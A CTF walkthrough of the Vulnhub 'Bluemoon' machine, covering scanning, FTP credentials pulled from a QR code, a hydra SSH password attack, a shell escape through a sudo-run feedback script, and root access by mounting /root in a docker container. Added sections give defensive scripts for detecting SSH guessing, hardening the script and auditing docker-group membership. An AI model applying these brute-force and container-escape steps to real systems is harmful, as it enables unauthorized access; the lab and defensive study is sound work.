Vulnhub Bluemoon: Detailed Walkthrough

Bluemoon

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ sudo netdiscover -i eth
Currently scanning: 192.168.92.0/16   |   Screen View: Unique Hosts                                                                          
                                                                                                                                              
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                             
 192.168.56.100  08:00:27:fd:b9:2d      1      60  PCS Systemtechnik GmbH                                                                     
 192.168.56.117  08:00:27:14:4c:68      1      60  PCS Systemtechnik GmbH    1

Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.117.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.117 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-14 21:46 EST
Nmap scan report for bogon (192.168.56.117)
Host is up (0.00032s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 2c:e2:63:78:bc:55:fe:f3:cb:09:a9:d8:26:2f:cb:d5 (RSA)
|   256 c4:c8:6b:48:92:25:a5:f7:00:9f:ab:b2:56:d5:ed:dc (ECDSA)
|_  256 a9:5b:39:a1:6e:05:91:0f:75:3c:88:0b:55:7c:a8:c2 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: BlueMoon:2021
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:14:4C:68 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.61 seconds

The target host has three open ports: 21 (FTP), 22 (SSH) and 80 (HTTP).

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ searchsploit vsftpd 3.0.3                                  
------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                               |  Path
------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service                                                                      | multiple/remote/49719.py
------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ ftp 192.168.56.117        
Connected to 192.168.56.117.
220 (vsFTPd 3.0.3)
Name (192.168.56.117:kali): anonymous
530 Permission denied.
ftp: Login failed
ftp> quit
221 Goodbye.

The vsftpd FTP service has no exploitable vulnerability for this version, and anonymous login is not allowed.

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ steghide extract -sf .blue.jpg 
Enter passphrase
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ stegseek .blue.jpg /usr/share/wordlists/rockyou.txt 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.91% (133.3 MB)           
[!] error: Could not find a valid passphrase.
: 

The image downloaded to the local Kali machine appears to be protected by a passphrase, but cracking it with the rockyou wordlist failed.

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ curl http://192.168.56.117/robots.txt                                                                     
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.117 Port 80</address>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ gobuster dir -u http://192.168.56.117 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.117
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/14 22:03:52 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
/hidden_text          (Status: 200) [Size: 1169]
Progress: 219133 / 220561 (99.35%)===============================================================
2022/11/14 22:04:35 Finished
===============================================================
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ curl http://192.168.56.117/hidden_text
<!doctype html>
<html>
<head>
    <title>Undergoing Work</title>
    <link rel="icon" href=".blue.jpg" type="image/icon type">
    <meta charset="utf-8" />
    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <style type="text/css">
    body {
        background-color: #f0f0f2;
        margin: 0;
        padding: 0;
        font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
        
    }
    div {
        width: 600px;
        margin: 5em auto;
        padding: 2em;
        background-color: #fdfdff;
        border-radius: 0.5em;
        box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
    }
    a:link, a:visited {
        color: #38488f;
        text-decoration: none;
    }
    @media (max-width: 700px) {
        div {
            margin: 0 auto;
            width: auto;
        }
    }
    </style>    
</head>

<body>
<div>
    <h1>Maintanance!</h1>
    <p>Sorry For Delay. We Will Recover Soon. </p>
    <p><a href=".QR_C0d3.png">Thank You ...</a></p>
</div>
</body>
</html>

The /hidden_text directory found by the scan, when opened in a browser, returns a page that contains a hidden image. The image is a QR code; scanning it yields the following:

#!/bin/bash
HOST=ip
USER=userftp
PASSWORD=ftpp@ssword
ftp -inv $HOST <<EOF
user $USER $PASSWORD
bye
EOF

This should be the FTP username and password; let's try them:

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ ftp 192.168.56.117
Connected to 192.168.56.117.
220 (vsFTPd 3.0.3)
Name (192.168.56.117:kali): userftp
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||61671|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             147 Mar 07  2021 information.txt
-rw-r--r--    1 0        0             363 Mar 07  2021 p_lists.txt
226 Directory send OK.
ftp> get information.txt
local: information.txt remote: information.txt
229 Entering Extended Passive Mode (|||35007|)
150 Opening BINARY mode data connection for information.txt (147 bytes).
100% |**************************************************************************************************|   147      163.68 KiB/s    00:00 ETA
226 Transfer complete.
147 bytes received in 00:00 (77.89 KiB/s)
ftp> get p_lists.txt
local: p_lists.txt remote: p_lists.txt
229 Entering Extended Passive Mode (|||61257|)
150 Opening BINARY mode data connection for p_lists.txt (363 bytes).
100% |**************************************************************************************************|   363        3.14 KiB/s    00:00 ETA
226 Transfer complete.
363 bytes received in 00:00 (3.12 KiB/s)
ftp> ls -alh
229 Entering Extended Passive Mode (|||22391|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Mar 07  2021 .
drwxr-xr-x    3 1001     1001         4096 Mar 07  2021 ..
-rw-r--r--    1 0        0             147 Mar 07  2021 information.txt
-rw-r--r--    1 0        0             363 Mar 07  2021 p_lists.txt
226 Directory send OK.
ftp> quit
221 Goodbye.

Let's look at the contents of the files downloaded from the FTP server to Kali:

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ ls     
information.txt  nmap_full_scan  p_lists.txt
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ cat information.txt                   

Hello robin ...!
    
    I'm Already Told You About Your Password Weekness. I will give a Password list. you May Choose Anyone of The Password.

                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ cat p_lists.txt    
h4ck3rp455wd
4dm1n
Pr0h4ck3r
5cr1ptk1dd3
pubgpr0pl4yer
H34d5h00t3r
p@ssw0rd
@@d1dn0tf1nd
J4ck_5p4rr0w
c4pt10n_jack
D0veC4m3r0n
f1nnb4l0r
r0manr3ing5
s3thr0lin5
Demonk1ng
R4ndy0rton
Big_sh0w
j0hnc3na
5tr0ngp@ssw0rd
S4br1n4
4nnlyn
C4rp3nt3r
K0fiKing5t0n
chNAMPIN
Herr0lins
G0palT0p3r
Log3shDriv3r
k4rv3ndh4nh4ck3r
P0nmuGunth0n
Shank3rD3v
KishorMilkV4n
S4th15hR4cer

The hint here is that the username is robin, and p_lists.txt can serve as the wordlist, so next we use hydra to brute-force the SSH password.

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ hydra -l robin -P p_lists.txt 192.168.56.117 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-14 22:12:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 32 login tries (l:1/p:32), ~2 tries per task
[DATA] attacking ssh://192.168.56.117:22/
[22][ssh] host: 192.168.56.117   login: robin   password: k4rv3ndh4nh4ck3r
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-14 22:12:16
                                                                                    
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ ssh robin@192.168.56.117                           
The authenticity of host '192.168.56.117 (192.168.56.117)' can't be established.
ED25519 key fingerprint is SHA256:C+Z/8na2o0LXAqk7WswSnNQya1ZPegq4CyO9DR+VXTw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.117' (ED25519) to the list of known hosts.
robin@192.168.56.117's password: 
Linux BlueMoon 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr  4 07:43:48 2021 from 192.168.43.44
robin@BlueMoon:~$ id
uid=1000(robin) gid=1000(robin) groups=1000(robin),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
robin@BlueMoon:~$ 

Successfully obtained a shell as user robin.
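A defender's view of the step above, as an added example that is not part of the original write-up: a password-guessing run like the hydra attempt leaves a burst of `Failed password` lines from one source address in /var/log/auth.log, and when it succeeds the burst ends with an `Accepted password` from the same address. The script below parses sshd syslog lines (the sample lines are constructed to resemble that run; the addresses, PIDs and ports are made up) and reports every source that crossed a failure threshold, noting whether a login from that source later succeeded.

```shell
#!/bin/sh
# Added example (not from the write-up): spot a password-guessing run in sshd
# syslog lines and report the source address. The log lines below are
# constructed to resemble what the hydra run would leave in /var/log/auth.log.

SAMPLE_AUTH_LOG=$(cat <<'EOF'
Nov 14 22:12:09 BlueMoon sshd[1201]: Failed password for robin from 192.168.56.101 port 40210 ssh2
Nov 14 22:12:09 BlueMoon sshd[1203]: Failed password for robin from 192.168.56.101 port 40212 ssh2
Nov 14 22:12:10 BlueMoon sshd[1205]: Failed password for robin from 192.168.56.101 port 40214 ssh2
Nov 14 22:12:10 BlueMoon sshd[1207]: Failed password for invalid user admin from 192.168.56.101 port 40216 ssh2
Nov 14 22:12:10 BlueMoon sshd[1209]: Failed password for robin from 192.168.56.101 port 40218 ssh2
Nov 14 22:12:11 BlueMoon sshd[1211]: Failed password for robin from 192.168.56.101 port 40220 ssh2
Nov 14 22:12:16 BlueMoon sshd[1233]: Accepted password for robin from 192.168.56.101 port 40290 ssh2
Nov 14 22:30:02 BlueMoon sshd[1402]: Failed password for robin from 192.168.56.1 port 51000 ssh2
Nov 14 22:30:09 BlueMoon sshd[1404]: Accepted password for robin from 192.168.56.1 port 51002 ssh2
EOF
)

# Usage: ssh_guess_report "$log_text" [threshold]
# Prints one line per source address with at least <threshold> failures
# (default 5): "<ip> <failures> <distinct users tried> <user accepted after failures|none>"
ssh_guess_report() {
    printf '%s\n' "$1" | awk -v threshold="${2:-5}" '
        /sshd\[[0-9]+\]: (Failed|Accepted) password for/ {
            for (i = 1; i <= NF; i++) {
                if ($i == "for") user = ($(i + 1) == "invalid") ? $(i + 3) : $(i + 1)
                if ($i == "from") ip = $(i + 1)
            }
            if ($6 == "Failed") {
                fails[ip]++
                if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
            } else if (fails[ip] > 0) {
                # a success that follows failures from the same source is the
                # signature of a guessed password rather than a mistyped one
                hit[ip] = user
            }
        }
        END {
            for (ip in fails)
                if (fails[ip] >= threshold)
                    print ip, fails[ip], users[ip], (ip in hit) ? hit[ip] : "none"
        }'
}

ssh_guess_report "$SAMPLE_AUTH_LOG" 5
```

On a live host, feed it `$(grep sshd /var/log/auth.log)`. The one genuine failure from 192.168.56.1 stays below the threshold, which is the point: a lockout tool such as fail2ban needs the same distinction. The durable fix for this finding is key-based authentication for the account, since the password came from a list the user was handed in plain text.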

robin@BlueMoon:~$ sudo -l
Matching Defaults entries for robin on bluemoon:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User robin may run the following commands on bluemoon:
    (jerry) NOPASSWD: /home/robin/project/feedback.sh

robin can run the feedback.sh script as jerry without a password; let's see whether that gives us jerry's shell directly.

Script For FeedBack

Enter Your Name : jason

Enter You FeedBack About This Target Machine : /bin/bash

id
uid=1002(jerry) gid=1002(jerry) groups=1002(jerry),114(docker)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
jerry@BlueMoon:/home/robin$ cd /home
jerry@BlueMoon:/home$ ls
jerry  robin  userftp
jerry@BlueMoon:/home$ cd jerry
jerry@BlueMoon:~$ ls -alh
total 32K
drwxr-xr-x 3 jerry jerry 4.0K Apr  4  2021 .
drwxr-xr-x 5 root  root  4.0K Mar  8  2021 ..
-rw------- 1 jerry jerry   16 Nov 14 19:16 .bash_history
-rw-r--r-- 1 jerry jerry  220 Apr 17  2019 .bash_logout
-rw-r--r-- 1 jerry jerry 3.5K Apr 17  2019 .bashrc
drwxr-xr-x 3 jerry jerry 4.0K Mar  8  2021 .local
-rw-r--r-- 1 jerry jerry  807 Apr 17  2019 .profile
-rw-r----- 1 jerry jerry  178 Mar  8  2021 user2.txt
jerry@BlueMoon:~$ cat user2.txt

You Found User-2 Flag
      
       ==> Fl4g{Y0ur34ch3du53r25uc355ful1y}

You Are Reached Near To Me... Try To Find
                     
                               - Root

jerry@BlueMoon:~$ cd .local
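The shell escape above works because feedback.sh hands the typed answer to the shell. The write-up does not show the script's source, so the vulnerable form in the comments below is an assumption reconstructed from that behaviour; the rest is an added hardened replacement, not the machine's own code. It treats the feedback as data and never evaluates it, and the log file location is also assumed.

```shell
#!/bin/sh
# Added example (not the machine's own feedback.sh, whose source the write-up
# does not show). Typing /bin/bash as the feedback and getting a shell as jerry
# is what happens when the answer is handed to eval or run as a command; that
# vulnerable form is reconstructed below as an assumption.
#
# Vulnerable pattern (assumed):
#   read FEEDBACK
#   eval "$FEEDBACK"   # executes whatever was typed, as the sudo target user
#
# Two rules for a script exposed through sudo: never evaluate user input, and
# keep the script in a root-owned directory the invoking user cannot modify.

FEEDBACK_FILE="${FEEDBACK_FILE:-/var/local/feedback.log}"   # assumed location

# Keep printable characters only (this drops newlines, so one entry cannot
# forge additional log records) and cap the length.
sanitize() {
    printf '%s' "$1" | tr -cd '[:print:]' | cut -c1-500
}

# record_feedback <name> <text>: append one tab-separated entry. The text is
# passed to printf as an argument, never to the shell as code.
record_feedback() {
    name=$(sanitize "$1")
    text=$(sanitize "$2")
    [ -n "$name" ] || return 1
    printf '%s\t%s\t%s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$name" "$text" >> "$FEEDBACK_FILE"
}

# Interactive entry point; read -r keeps backslashes literal.
main() {
    printf 'Enter Your Name : '
    read -r name
    printf 'Enter You FeedBack About This Target Machine : '
    read -r text
    record_feedback "$name" "$text" && echo "Thank you, your feedback was recorded."
}

# Show the prompts only when FEEDBACK_INTERACTIVE=1, so the functions can be
# sourced and tested without blocking on stdin.
if [ "${FEEDBACK_INTERACTIVE:-0}" = 1 ]; then
    main
fi
```

Run it with `FEEDBACK_INTERACTIVE=1` to get the prompts. The sudoers entry itself also deserves attention: it points at /home/robin/project/feedback.sh, a path under the invoking user's own home directory, where the user normally controls the file; a sudo-exposed helper belongs in a root-owned location such as /usr/local/sbin with mode 755 or tighter.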

Privilege escalation

jerry@BlueMoon:~/.local$ id
uid=1002(jerry) gid=1002(jerry) groups=1002(jerry),114(docker)

User jerry is a member of the docker group, and the docker daemon runs as root, so we start by mounting the host's filesystem into a container.

jerry@BlueMoon:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
alpine              latest              28f6e2705743        21 months ago       5.61MB
jerry@BlueMoon:~$ docker run -v /root:/mnt -it -alpine
invalid argument "lpine" for "-a, --attach" flag: valid streams are STDIN, STDOUT and STDERR
See 'docker run --help'.
jerry@BlueMoon:~$ docker run -v /root:/mnt -it alpine
/ # ls
bin    etc    lib    mnt    proc   run    srv    tmp    var
dev    home   media  opt    root   sbin   sys    usr
/ # cd /root
~ # cd /mnt
/mnt # ls
root.txt
/mnt # cat root.txt

==> Congratulations <==

You Reached Root...!

Root-Flag 
    
     Fl4g{r00t-H4ckTh3P14n3t0nc34g41n}

Created By 
       
        Kirthik - Karvendhan
                    
 
instagram = ____kirthik____



!......Bye See You Again......!

/mnt # 

Successfully obtained the root flag!!!
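A check for the condition this step relies on, as an added example that is not taken from the write-up: membership in docker (and in a few similar groups) is equivalent to root, because the daemon runs as root and will bind-mount any host path into a container on request, exactly as `docker run -v /root:/mnt` does above. The script audits an /etc/group file (a constructed excerpt here that mirrors the finding, with jerry in docker) and lists every explicit member of a root-equivalent group.

```shell
#!/bin/sh
# Added example (not from the write-up): audit /etc/group for members of groups
# that are root-equivalent on a typical Linux host. The group file below is a
# constructed excerpt mirroring the finding above (jerry in docker).

SAMPLE_GROUP_FILE=$(cat <<'EOF'
root:x:0:
disk:x:6:
sudo:x:27:
plugdev:x:46:robin
docker:x:114:jerry
lxd:x:130:
EOF
)

# Membership in any of these grants root-equivalent power: docker and lxd can
# start containers that bind-mount the host filesystem, disk reads block
# devices directly, sudo/wheel usually carry an ALL rule in sudoers.
ROOT_EQUIV_GROUPS="docker lxd disk sudo wheel"

# Usage: root_equiv_members "$group_file_text"
# Prints "<group> <user>" for every explicit member of a watched group.
root_equiv_members() {
    printf '%s\n' "$1" | awk -F: -v watchlist="$ROOT_EQUIV_GROUPS" '
        BEGIN { n = split(watchlist, g, " "); for (i = 1; i <= n; i++) watch[g[i]] = 1 }
        ($1 in watch) && $4 != "" {
            m = split($4, members, ",")
            for (i = 1; i <= m; i++) print $1, members[i]
        }'
}

# Live use on a host: root_equiv_members "$(cat /etc/group)"
root_equiv_members "$SAMPLE_GROUP_FILE"
```

Only supplementary memberships appear in /etc/group; a user whose primary gid in /etc/passwd is the docker group would be missed, so pair this with `getent group docker` or `id <user>` on the host. The remediation is to remove the membership and, where users genuinely need containers, run rootless Docker or put a socket proxy in front of the daemon that refuses bind mounts.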

Posted 2022-11-15 11:34 by Jason_huawen, 168 views, 0 comments